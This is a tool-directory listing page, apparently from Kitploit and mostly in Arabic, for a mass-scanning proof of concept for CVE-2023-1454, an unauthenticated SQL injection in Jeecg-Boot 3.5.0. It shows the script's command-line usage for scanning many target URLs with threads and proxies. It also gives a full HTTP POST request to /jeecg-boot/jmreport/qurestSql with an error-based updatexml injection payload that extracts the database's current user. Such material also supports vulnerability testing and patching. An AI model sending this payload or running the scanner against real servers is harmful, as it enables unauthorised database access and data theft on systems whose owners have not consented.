Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sweelg/cve-2023-1454-jeecg-boot-qurestsql-sqlvuln
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubsweelg/cve-2023-1454-jeecg-boot-qurestsql-sqlvuln

CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln

jmreport/qurestSql PoC للفحص الجماعي لثغرات حقن SQL غير المصرح بها. Jeecg-Boot هي منصة تطوير سريعة مبنية على Spring Boot وJeecg-Boot-Plus، وقد تم اكتشاف عدة ثغرات حقن SQL في أحدث إصدار jeecg-boot 3.5.0.

عرض المستودع
2157منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-1454 Jeecg-Boot-qurestSql-SQLvuln

jmreport/qurestSql POC للمسح الجماعي لثغرات حقن SQL غير المصرح بها. Jeecg-Boot هي منصة تطوير سريعة مبنية على Spring Boot وJeecg-Boot-Plus. تم اكتشاف العديد من ثغرات حقن SQL في أحدث إصدار jeecg-boot 3.5.0.

الاستخدام

usage: CVE-2023-1454.py [-h] [-u URL] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT] [-p PROXY]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target url(e.g. url.txt)
  -f FILE, --file FILE  Target file(e.g. url.txt)
  -t THREAD, --thread THREAD
                        Number of thread (default 5)
  -T TIMEOUT, --timeout TIMEOUT
                        Request timeout (default 3)
  -o OUTPUT, --output OUTPUT
                        Vuln url output file (e.g. result.txt)
  -p PROXY, --proxy PROXY
                        Request Proxy (e.g http://127.0.0.1:8080)

POC:

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Content-Length: 128

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

إخلاء المسؤولية

أي عواقب أو خسائر مباشرة أو غير مباشرة ناتجة عن نشر أو استخدام المعلومات الواردة في هذا المستند، تقع جميعها على عاتق المستخدم نفسه، ولا يتحمل المؤلف أي مسؤولية عنها.

تنزيل الأداة